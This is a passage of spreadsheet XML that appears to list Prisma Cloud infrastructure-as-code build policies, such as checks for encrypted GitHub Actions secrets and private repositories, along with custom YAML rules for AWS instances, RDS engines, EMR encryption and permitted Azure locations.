          <t>GitHub Actions Environment Secrets defined in Terraform are not encrypted</t>
        </is>
      </c>
      <c r="L1467" t="inlineStr"/>
      <c r="M1467" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1467" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1467" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1467" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1467" t="inlineStr"/>
      <c r="R1467" t="inlineStr"/>
      <c r="S1467" t="inlineStr"/>
      <c r="T1467" t="b">
        <v>0</v>
      </c>
      <c r="U1467" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1467" t="inlineStr">
        <is>
          <t>IaC:Storage:github-actions-environment-secret,github-actions-organization-secret,github-actions-secret</t>
        </is>
      </c>
      <c r="W1467" t="inlineStr">
        <is>
          <t>Ensure GitHub Actions secrets are encrypted</t>
        </is>
      </c>
      <c r="X1467" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/build-integrity-policies/github-policies/ensure-github-actions-secrets-are-encrypted</t>
        </is>
      </c>
      <c r="Y1467" t="inlineStr"/>
      <c r="Z1467" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["github_actions_environment_secret","github_actions_organization_secret","github_actions_secret"]}</t>
        </is>
      </c>
      <c r="AA1467" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1467" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1467" t="inlineStr">
        <is>
          <t>CKV_GIT_4</t>
        </is>
      </c>
      <c r="AD1467" t="b">
        <v>1</v>
      </c>
      <c r="AE1467" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1467" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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7" t="inlineStr">
        <is>
          <t>5b6b0289-e698-4aa1-9a31-c7e03c6ff016</t>
        </is>
      </c>
      <c r="AI1467" t="inlineStr"/>
      <c r="AJ1467" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1467" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1468">
      <c r="A1468" t="inlineStr"/>
      <c r="B1468" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1468" s="2" t="inlineStr"/>
      <c r="D1468" t="inlineStr"/>
      <c r="E1468" t="inlineStr"/>
      <c r="F1468" t="inlineStr"/>
      <c r="G1468" t="b">
        <v>1</v>
      </c>
      <c r="H14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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1468" t="inlineStr">
        <is>
          <t>IaC:Storage:github-repository</t>
        </is>
      </c>
      <c r="K1468" t="inlineStr">
        <is>
          <t>GitHub repository defined in Terraform is not Private</t>
        </is>
      </c>
      <c r="L1468" t="inlineStr"/>
      <c r="M1468" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1468" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1468" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1468" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1468" t="inlineStr"/>
      <c r="R1468" t="inlineStr"/>
      <c r="S1468" t="inlineStr">
        <is>
          <t>Policy Status Review</t>
        </is>
      </c>
      <c r="T1468" t="b">
        <v>0</v>
      </c>
      <c r="U1468" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1468" t="inlineStr">
        <is>
          <t>IaC:Storage:github-repository</t>
        </is>
      </c>
      <c r="W1468" t="inlineStr">
        <is>
          <t>Ensure GitHub repository is private</t>
        </is>
      </c>
      <c r="X1468" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/build-integrity-policies/github-policies/ensure-repository-is-private</t>
        </is>
      </c>
      <c r="Y1468" t="inlineStr"/>
      <c r="Z1468" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["github_repository"]}</t>
        </is>
      </c>
      <c r="AA1468" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1468" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1468" t="inlineStr">
        <is>
          <t>CKV_GIT_1</t>
        </is>
      </c>
      <c r="AD1468" t="b">
        <v>1</v>
      </c>
      <c r="AE1468" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1468" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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8" t="inlineStr">
        <is>
          <t>f620ff53-e5d6-45a1-b68b-83bc35f7e946</t>
        </is>
      </c>
      <c r="AI1468" t="inlineStr"/>
      <c r="AJ1468" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1468" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1469">
      <c r="A1469" t="inlineStr"/>
      <c r="B1469" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1469" s="2" t="inlineStr"/>
      <c r="D1469" t="inlineStr"/>
      <c r="E1469" t="inlineStr"/>
      <c r="F1469" t="inlineStr"/>
      <c r="G1469" t="b">
        <v>1</v>
      </c>
      <c r="H14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69" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1469" t="inlineStr">
        <is>
          <t>IaC:Storage:gitlab-project</t>
        </is>
      </c>
      <c r="K1469" t="inlineStr">
        <is>
          <t>Gitlab project defined in Terraform does not prevent secrets</t>
        </is>
      </c>
      <c r="L1469" t="inlineStr"/>
      <c r="M1469" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1469" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1469" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1469" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1469" t="inlineStr"/>
      <c r="R1469" t="inlineStr"/>
      <c r="S1469" t="inlineStr"/>
      <c r="T1469" t="b">
        <v>0</v>
      </c>
      <c r="U1469" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1469" t="inlineStr">
        <is>
          <t>IaC:Storage:gitlab-project</t>
        </is>
      </c>
      <c r="W1469" t="inlineStr">
        <is>
          <t>Ensure prevent secrets is enabled</t>
        </is>
      </c>
      <c r="X1469" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-prevent-secrets-is-enabled</t>
        </is>
      </c>
      <c r="Y1469" t="inlineStr"/>
      <c r="Z1469" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["gitlab_project"]}</t>
        </is>
      </c>
      <c r="AA1469" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1469" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1469" t="inlineStr">
        <is>
          <t>CKV_GLB_3</t>
        </is>
      </c>
      <c r="AD1469" t="b">
        <v>1</v>
      </c>
      <c r="AE1469" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1469" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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69" t="inlineStr">
        <is>
          <t>67e38511-5836-4eaa-8925-53b9e58cc567</t>
        </is>
      </c>
      <c r="AI1469" t="inlineStr"/>
      <c r="AJ1469" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1469" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1470">
      <c r="A1470" t="inlineStr"/>
      <c r="B1470" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1470" s="2" t="inlineStr"/>
      <c r="D1470" t="inlineStr"/>
      <c r="E1470" t="inlineStr"/>
      <c r="F1470" t="inlineStr"/>
      <c r="G1470" t="b">
        <v>1</v>
      </c>
      <c r="H14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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1470" t="inlineStr">
        <is>
          <t>IaC:compute:aws:aws_instance</t>
        </is>
      </c>
      <c r="K1470" t="inlineStr">
        <is>
          <t>Akintest - FRB testing</t>
        </is>
      </c>
      <c r="L1470" t="inlineStr"/>
      <c r="M1470" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1470" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1470" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1470" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1470" t="inlineStr"/>
      <c r="R1470" t="inlineStr"/>
      <c r="S1470" t="inlineStr"/>
      <c r="T1470" t="b">
        <v>0</v>
      </c>
      <c r="U1470" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1470" t="inlineStr">
        <is>
          <t>IaC:compute:aws:aws_instance</t>
        </is>
      </c>
      <c r="W1470" t="inlineStr">
        <is>
          <t>Policy description</t>
        </is>
      </c>
      <c r="X1470" t="inlineStr"/>
      <c r="Y1470" t="inlineStr"/>
      <c r="Z1470" t="inlineStr">
        <is>
          <t>metadata:
  name: 'Akintest - FRB testing'
  severity: low
  guidelines: 'Policy description'
  category: compute
scope:
 provider: aws
definition:
  or:
  - cond_type: attribute
    resource_types:
    - aws_instance
    attribute: ami
    operator: within
    value:
     - 'al2023-ami-2023.2.20230901.0-kernel-6.1-x86_64'</t>
        </is>
      </c>
      <c r="AA1470" t="inlineStr">
        <is>
          <t>William Mora</t>
        </is>
      </c>
      <c r="AB1470" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1470" t="inlineStr"/>
      <c r="AD1470" t="b">
        <v>0</v>
      </c>
      <c r="AE1470" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1470" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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0" t="inlineStr">
        <is>
          <t>c554b0f0-0065-44b8-9e55-74567d4a6152</t>
        </is>
      </c>
      <c r="AI1470" t="inlineStr"/>
      <c r="AJ1470" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1470" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1471">
      <c r="A1471" t="inlineStr"/>
      <c r="B1471" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1471" s="2" t="inlineStr"/>
      <c r="D1471" t="inlineStr"/>
      <c r="E1471" t="inlineStr"/>
      <c r="F1471" t="inlineStr"/>
      <c r="G1471" t="b">
        <v>0</v>
      </c>
      <c r="H147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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1471" t="inlineStr">
        <is>
          <t>IaC:compute:aws:aws_instance</t>
        </is>
      </c>
      <c r="K1471" t="inlineStr">
        <is>
          <t>FRB testing</t>
        </is>
      </c>
      <c r="L1471" t="inlineStr"/>
      <c r="M1471" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1471" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1471" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1471" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1471" t="inlineStr"/>
      <c r="R1471" t="inlineStr"/>
      <c r="S1471" t="inlineStr"/>
      <c r="T1471" t="b">
        <v>0</v>
      </c>
      <c r="U1471" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1471" t="inlineStr">
        <is>
          <t>IaC:compute:aws:aws_instance</t>
        </is>
      </c>
      <c r="W1471" t="inlineStr">
        <is>
          <t>Policy description</t>
        </is>
      </c>
      <c r="X1471" t="inlineStr"/>
      <c r="Y1471" t="inlineStr"/>
      <c r="Z1471" t="inlineStr">
        <is>
          <t>metadata:
  name: 'FRB testing'
  severity: low
  guidelines: 'Policy description'
  category: compute
scope:
 provider: aws
definition:
  or:
  - cond_type: attribute
    resource_types:
    - aws_instance
    attribute: ami
    operator: within
    value:
     - 'al2023-ami-2023.2.20230901.0-kernel-6.1-x86_64'
     - 'ami-0abcdef1234567890'
     - 'ami-1bcdefa2345678901'
     - 'ami-2cdefab3456789012'
     - 'ami-3defabc4567890123'
     - 'ami-4efabcd5678901234'</t>
        </is>
      </c>
      <c r="AA1471" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1471" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1471" t="inlineStr"/>
      <c r="AD1471" t="b">
        <v>0</v>
      </c>
      <c r="AE1471" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1471" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG147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1" t="inlineStr">
        <is>
          <t>f4f87c13-70e2-4247-a4c0-50490ea90aa7</t>
        </is>
      </c>
      <c r="AI1471" t="inlineStr"/>
      <c r="AJ1471" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1471" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1472">
      <c r="A1472" t="inlineStr"/>
      <c r="B1472" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1472" s="2" t="inlineStr"/>
      <c r="D1472" t="inlineStr"/>
      <c r="E1472" t="inlineStr"/>
      <c r="F1472" t="inlineStr"/>
      <c r="G1472" t="b">
        <v>1</v>
      </c>
      <c r="H14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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1472" t="inlineStr">
        <is>
          <t>IaC:general:aws:AWS::RDS::DBInstance</t>
        </is>
      </c>
      <c r="K1472" t="inlineStr">
        <is>
          <t>Test build policy for Baxter: rds engine is mysql</t>
        </is>
      </c>
      <c r="L1472" t="inlineStr"/>
      <c r="M1472" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1472" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1472" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1472" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1472" t="inlineStr"/>
      <c r="R1472" t="inlineStr"/>
      <c r="S1472" t="inlineStr"/>
      <c r="T1472" t="b">
        <v>0</v>
      </c>
      <c r="U1472" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1472" t="inlineStr">
        <is>
          <t>IaC:general:aws:AWS::RDS::DBInstance</t>
        </is>
      </c>
      <c r="W1472" t="inlineStr"/>
      <c r="X1472" t="inlineStr"/>
      <c r="Y1472" t="inlineStr"/>
      <c r="Z1472" t="inlineStr">
        <is>
          <t>---
metadata:
  name: "Test build policy for Baxter: rds engine is mysql"
  severity: "high"
  guidelines: "fix it"
  category: general
scope:
  provider: aws
definition:
  or:
    - cond_type: attribute
      resource_types: 
      - AWS::RDS::DBInstance
      attribute: Engine
      operator: contains
      value: "aurora" #Case Sensitive
    - cond_type: attribute
      resource_types: 
      - AWS::RDS::DBInstance
      attribute: Engine
      operator: contains
      value: "MySQL" #Case Sensitive</t>
        </is>
      </c>
      <c r="AA1472" t="inlineStr">
        <is>
          <t>Akintayo Akinbade</t>
        </is>
      </c>
      <c r="AB1472" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1472" t="inlineStr"/>
      <c r="AD1472" t="b">
        <v>0</v>
      </c>
      <c r="AE1472" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1472" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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2" t="inlineStr">
        <is>
          <t>8f6a6f2c-32c7-4839-a411-46a36d73a4b4</t>
        </is>
      </c>
      <c r="AI1472" t="inlineStr"/>
      <c r="AJ1472" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1472" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1473">
      <c r="A1473" t="inlineStr"/>
      <c r="B1473" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1473" s="2" t="inlineStr"/>
      <c r="D1473" t="inlineStr"/>
      <c r="E1473" t="inlineStr"/>
      <c r="F1473" t="inlineStr"/>
      <c r="G1473" t="b">
        <v>1</v>
      </c>
      <c r="H14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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1473" t="inlineStr">
        <is>
          <t>IaC:general:aws:aws_emr_cluster</t>
        </is>
      </c>
      <c r="K1473" t="inlineStr">
        <is>
          <t>build_policy_003: CUST 806079845162856448 - TF</t>
        </is>
      </c>
      <c r="L1473" t="inlineStr"/>
      <c r="M1473" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1473" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1473" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1473" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1473" t="inlineStr"/>
      <c r="R1473" t="inlineStr"/>
      <c r="S1473" t="inlineStr"/>
      <c r="T1473" t="b">
        <v>0</v>
      </c>
      <c r="U1473" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1473" t="inlineStr">
        <is>
          <t>IaC:general:aws:aws_emr_cluster</t>
        </is>
      </c>
      <c r="W1473" t="inlineStr">
        <is>
          <t>fix it</t>
        </is>
      </c>
      <c r="X1473" t="inlineStr"/>
      <c r="Y1473" t="inlineStr"/>
      <c r="Z1473" t="inlineStr">
        <is>
          <t>metadata:
  category: general
  name: 'build_policy_003: CUST 806079845162856448 - TF'
  guidelines: fix it
  severity: high
scope:
  provider: aws
definition:
  and:
  - cond_type: filter
    attribute: resource_type
    operator: within
    value: aws_emr_cluster
  - or:
    - cond_type: connection
      resource_types:
      - aws_emr_cluster
      connected_resource_types:
      - aws_emr_security_configuration
      operator: not_exists
    - and:
      - cond_type: connection
        resource_types:
        - aws_emr_cluster
        connected_resource_types:
        - aws_emr_security_configuration
        operator: exists
      - cond_type: attribute
        resource_types:
        - aws_emr_security_configuration
        attribute: configuration.EncryptionConfiguration.EnableInTransitEncryption
        operator: equals
        value: true</t>
        </is>
      </c>
      <c r="AA1473" t="inlineStr">
        <is>
          <t>Raj Annaladasu</t>
        </is>
      </c>
      <c r="AB1473" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1473" t="inlineStr"/>
      <c r="AD1473" t="b">
        <v>0</v>
      </c>
      <c r="AE1473" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1473" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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3" t="inlineStr">
        <is>
          <t>13fa5137-a99e-4555-9076-2e2a474d8881</t>
        </is>
      </c>
      <c r="AI1473" t="inlineStr"/>
      <c r="AJ1473" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1473" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1474">
      <c r="A1474" t="inlineStr"/>
      <c r="B1474" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1474" s="2" t="inlineStr"/>
      <c r="D1474" t="inlineStr"/>
      <c r="E1474" t="inlineStr"/>
      <c r="F1474" t="inlineStr"/>
      <c r="G1474" t="b">
        <v>0</v>
      </c>
      <c r="H14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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1474" t="inlineStr">
        <is>
          <t>IaC:general:aws:aws_instance</t>
        </is>
      </c>
      <c r="K1474" t="inlineStr">
        <is>
          <t>ec2-t2-micro</t>
        </is>
      </c>
      <c r="L1474" t="inlineStr"/>
      <c r="M1474" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1474" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1474" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1474" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1474" t="inlineStr"/>
      <c r="R1474" t="inlineStr"/>
      <c r="S1474" t="inlineStr"/>
      <c r="T1474" t="b">
        <v>0</v>
      </c>
      <c r="U1474" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1474" t="inlineStr">
        <is>
          <t>IaC:general:aws:aws_instance</t>
        </is>
      </c>
      <c r="W1474" t="inlineStr"/>
      <c r="X1474" t="inlineStr"/>
      <c r="Y1474" t="inlineStr"/>
      <c r="Z1474" t="inlineStr">
        <is>
          <t>---
metadata:
  name: "ec2-t2-micro"
  severity: "high"
  guidelines: "Ensure specific tags are enforced" 
  category: general
scope:
  provider: aws
definition:
    cond_type: attribute  
    resource_types:
      - aws_instance                   
    attribute: instance_type
    operator: not_contains
    value: "t2.micro"</t>
        </is>
      </c>
      <c r="AA1474" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1474" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1474" t="inlineStr"/>
      <c r="AD1474" t="b">
        <v>0</v>
      </c>
      <c r="AE1474" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1474" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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4" t="inlineStr">
        <is>
          <t>34342ecc-d973-4e42-b7f6-4c7b9d9e391a</t>
        </is>
      </c>
      <c r="AI1474" t="inlineStr"/>
      <c r="AJ1474" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1474" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1475">
      <c r="A1475" t="inlineStr"/>
      <c r="B1475" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1475" s="2" t="inlineStr"/>
      <c r="D1475" t="inlineStr"/>
      <c r="E1475" t="inlineStr"/>
      <c r="F1475" t="inlineStr"/>
      <c r="G1475" t="b">
        <v>0</v>
      </c>
      <c r="H14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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1475" t="inlineStr">
        <is>
          <t>IaC:general:azure:all</t>
        </is>
      </c>
      <c r="K1475" t="inlineStr">
        <is>
          <t>Akintest - Ensure resources are only created in permitted locations</t>
        </is>
      </c>
      <c r="L1475" t="inlineStr"/>
      <c r="M1475" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1475" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1475" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1475" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1475" t="inlineStr"/>
      <c r="R1475" t="inlineStr"/>
      <c r="S1475" t="inlineStr"/>
      <c r="T1475" t="b">
        <v>0</v>
      </c>
      <c r="U1475" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1475" t="inlineStr">
        <is>
          <t>IaC:general:azure:all</t>
        </is>
      </c>
      <c r="W1475" t="inlineStr">
        <is>
          <t>Explanation of which resource_types can use which locations.</t>
        </is>
      </c>
      <c r="X1475" t="inlineStr"/>
      <c r="Y1475" t="inlineStr"/>
      <c r="Z1475" t="inlineStr">
        <is>
          <t>metadata:
  name: Akintest - Ensure resources are only created in permitted locations
  id: BC_AZ_C_001
  guidelines: 'Explanation of which resource_types can use which locations. '
  category: general
  severity: low
scope:
  provider: azure
definition:
  or:
  - cond_type: attribute
    resource_types:
    - all
    attribute: location
    operator: within
    value:
    - West US</t>
        </is>
      </c>
      <c r="AA1475" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1475" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1475" t="inlineStr"/>
      <c r="AD1475" t="b">
        <v>0</v>
      </c>
      <c r="AE1475" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1475" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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5" t="inlineStr">
        <is>
          <t>0f868c7c-3041-45c9-ba14-6784d7a8bacd</t>
        </is>
      </c>
      <c r="AI1475" t="inlineStr"/>
      <c r="AJ1475" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1475" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1476">
      <c r="A1476" t="inlineStr"/>
      <c r="B1476" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1476" s="2" t="inlineStr"/>
      <c r="D1476" t="inlineStr"/>
      <c r="E1476" t="inlineStr"/>
      <c r="F1476" t="inlineStr"/>
      <c r="G1476" t="b">
        <v>0</v>
      </c>
      <c r="H14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476" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1476" t="inlineStr">
        <is>
          <t>IaC:general:azure:all</t>
        </is>
      </c>
      <c r="K1476" t="inlineStr">
        <is>
          <t>tom-infra11 Ensure resources are only created in permitted locations</t>
        </is>
      </c>
      <c r="L1476" t="inlineStr"/>
      <c r="M1476" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1476" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1476" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1476" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1476" t="inlineStr"/>
      <c r="R1476" t="inlineStr"/>
      <c r="S1476" t="inlineStr">
        <is>
          <t>tplisson,PSO</t>
        </is>
      </c>
      <c r="T1476" t="b">
        <v>0</v>
      </c>
      <c r="U1476" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1476" t="inlineStr">
        <is>
          <t>IaC:general:azure:all</t>
        </is>
      </c>
      <c r="W1476" t="inlineStr">
        <is>
          <t>Ensure resources are only created in permitted locations</t>
        </is>
      </c>
      <c r="X1476" t="inlineStr">
        <is>
          <t>fix it</t>
        </is>
      </c>
      <c r="Y1476" t="inlineStr"/>
      <c r="Z1476" t="inlineStr">
        <is>
          <t>---
metadata:
  name: "tom-infra11 Ensure resources are only created in permitted locations"
  severity: "high"
  guidelines: "Ensure resources are only created in permitted locations"
  category: general
scope:
  provider: azure
definition:
  and:
    - cond_type: attribute
      resource_types:
        - all
        # - azurerm_resource_group
      attribute: location
      operator: within
      value:
        - "Canada Central"
        - "Canada East"
        - "East US 2"
        - "Central US"
        - "Japan East"
        - "Japan West"
        - "East Asia"
        - "Southeast Asia"
        - "canadacentral"
        - "canadaeast"
        - "eastus2"
        - "centralus"
        - "japaneast"
        - "japanwest"
        - "eastasia"
        - "southeastasia"</t>
        </is>
      </c>
      <c r="AA1476" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1476" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1476" t="inlineStr"/>
      <c r="AD1476" t="b">
        <v>0</v>
      </c>
      <c r="AE1476" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1476" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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476" t="inlineStr">
        <is>
          <t>452cbd47-d387-4824-89f9-7f79d653ef78</t>
        </is>
      </c>
      <c r="AI1476" t="inlineStr"/>
      <c r="AJ1476" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1476" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1477">
      <c r="A1477" t="inlineStr"/>
      <c r="B1477" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1477" s="2" t="inlineStr"/>
      <c r="D1477" t="inlineStr"/>
      <c r="E1477" t="inlineStr"/>
